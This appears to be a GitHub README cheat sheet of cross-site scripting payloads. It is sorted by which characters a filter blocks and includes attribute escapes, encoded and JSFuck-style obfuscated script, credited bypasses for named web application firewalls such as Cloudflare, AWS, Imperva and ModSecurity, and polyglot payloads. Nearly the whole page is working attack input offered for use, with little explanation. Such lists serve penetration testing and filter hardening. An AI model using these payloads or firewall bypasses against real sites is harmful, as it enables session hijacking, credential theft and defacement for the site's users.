Skip to content

Latest commit

 

History

History

XSS payloads

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 

README.md

1.If you cannot escape from the attribute (" is being encoded or deleted)

Try to use this payloads :

1) <a href="javascript:alert(1)">Click</a>

2) <a href="&#01;javascript:alert(1)">Click</a>

3) <a href="javascript:{ alert`0` }">Click</a>

4) <a src="google.com" onclick="alert(1)">Click</a>

Or try to replace " with \u0022, > with \u003e and < with \u003c. So the payload will be:

4) \u0022\u003e\u003cimg src=x onerror=alert(1)\u003e\u003cx y=\u0022

2.If you can escape from the attribute but not from the tag (> is encoded or deleted)

Try to event handlers :

1) <input   value"XXXXXXX"   onclick=alert(1)  >Click</input>

2) <input  type:"text" value="XSS"  accesskey="x" onclick="alert(1)" >

3) <img src=x  onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

4) </div><a  src="google.com"  href="javaSCRIPT&colon;alert(/xss/)">XSS</a>

5) <a  href=https://google.com onclick=alert(document.location.hash.substring(1))#{saasasasas}>Click</a>

or use encodes:

use Unicodes - UTF8 - UTF16 - UTF32
%3cscript%3e
%253cscript%253e
&lt;script&gt;

%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)> 
%uFF1Csvg onload=alert(3)>

Burp Suite > Convert Selection > HTML > HTML-encode all character
<a href="javascript:alert(1)">Click</a> =
&lt;&#97;&#32;&#104;&#114;&#101;&#102;&#61;&quot;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&quot;&gt;&#67;&#108;&#105;&#99;&#107;&lt;&#47;&#97;&gt;

3.If alert is encoded or deleted

Try to use this payloads :

1) <script>$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()</script>

2) <script>[[,$,_,$$,__,$_,_$,$$$,$__,,___]=[![]+[]+!![]][+[]]+[][[]]],$$_=[][$+$_],[,,,$_$,,,_$$,,,,,__$,_$_]=[...$$_+[]],$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$$$_[$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$]($+_+__+_$+$_+__$+[+!!$]+_$_)()</script>

3) <script>([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+`(1)`)()</script>
   
4) <html>
   <body>
   <head>
   <meta charset="utf-8">   
   </head> 
   <script>
   ᐁ='',ᐃ=!ᐁ+ᐁ,ᐅ=!ᐃ+ᐁ
   ᐊ=ᐁ+{},ᐄ=ᐃ[ᐁ++],ᐆ=
   ᐃ[ᐋ=ᐁ],ᐒ=++ᐋ+ᐁ,ᐗ
   =ᐊ[ᐋ+ᐒ],ᐃ[ᐗ+=ᐊ[ᐁ]
   +(ᐃ.ᐅ+ᐊ)[ᐁ]+ᐅ[ᐒ]+ᐄ
   +ᐆ+ᐃ[ᐋ]+ᐗ+ᐄ+ᐊ[ᐁ]
   +ᐆ][ᐗ](ᐅ[ᐁ]+ᐅ[ᐋ]+ᐃ
   [ᐒ]+ᐆ+ᐄ+"`ᐁᐃ`")()
   </script>
   </html>
   </body>

5) <script>prompt(1)</script>

6) <a"/onclick=(confirm)()>Click Here!

7) <script>/&/-alert(1)</script>
<script>/&amp;/-alert(1)</script>

8) %00%00%00%00%00%00%00<script>alert(1)</script>     (1.Null bytes are output   2.There is no space character immediately before)

9) <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`">

10) <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click 

11) <script>alert.call(null,1)</script>   (alert.call(%20, "XSS");)

12) <script>confirm.call(null,1)</script>

13) <script>prompt.call(null,1)</script>

14) <script>alert.apply(null, [1])</script>

15) <iframe src=//14.rs>

16) <form><button formaction=http://14.rs>Hacked</form>

4.If space is encoded or deleted

use tab url encode : %09
<input%09value"XXXXXXX"%09onclick=alert(1)>Click</input>

5.If () is encoded or deleted

<script>alert`1`</script>

5.If <script> is encoded or deleted try other tags like:

SVG, img, iframe

6.Some WAF bypass:

@vanshitmalhotra | Bypass AWS WAF -// 
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>

@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc 
<img  sr%00c=x o%00nerror=((pro%00mpt(1)))>

DotDefender WAF bypass by @0xInfection 
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme

@LooseSecurity | Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter in the wild):
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
Javascript URI cushioned between carriage returns with a non-bracketed prompt.

@daveysec | Was able to bypass Imperva Incapsula WAF with:
<svg onload\r\n=$.globalEval("al"+"ert()");>

@rodolfoassis | Wordfence 7.4.2
<a href=&#01javascript:alert(1)>

rodolfoassis | Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>

rodolfoassis | ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript&colon;alert(1)">
   
@brutelogic | Cloudflare
<Svg Only=1 OnLoad=alert(1)>
   
<script>{onerror=alert}throw 1</script> -->

<script>eval.call`${'alert\x2823\x29'}`</script>

<img src=x onerror=this.innerHTML=String.fromCharCode(60,105,109,103,32,115,114,99,61,39,120,39,32,111,110,101,114,114,111,114,61,39,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59,39,62)

### 7.Some good stuffs:
https://github.com/Walidhossain010/WAF-bypass-xss-payloads
https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057

7.XSS PolyglotsPolice: revolving allow you to test multiple XSS scenarios with ONE payload. Work smarter not harder:

xss

-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e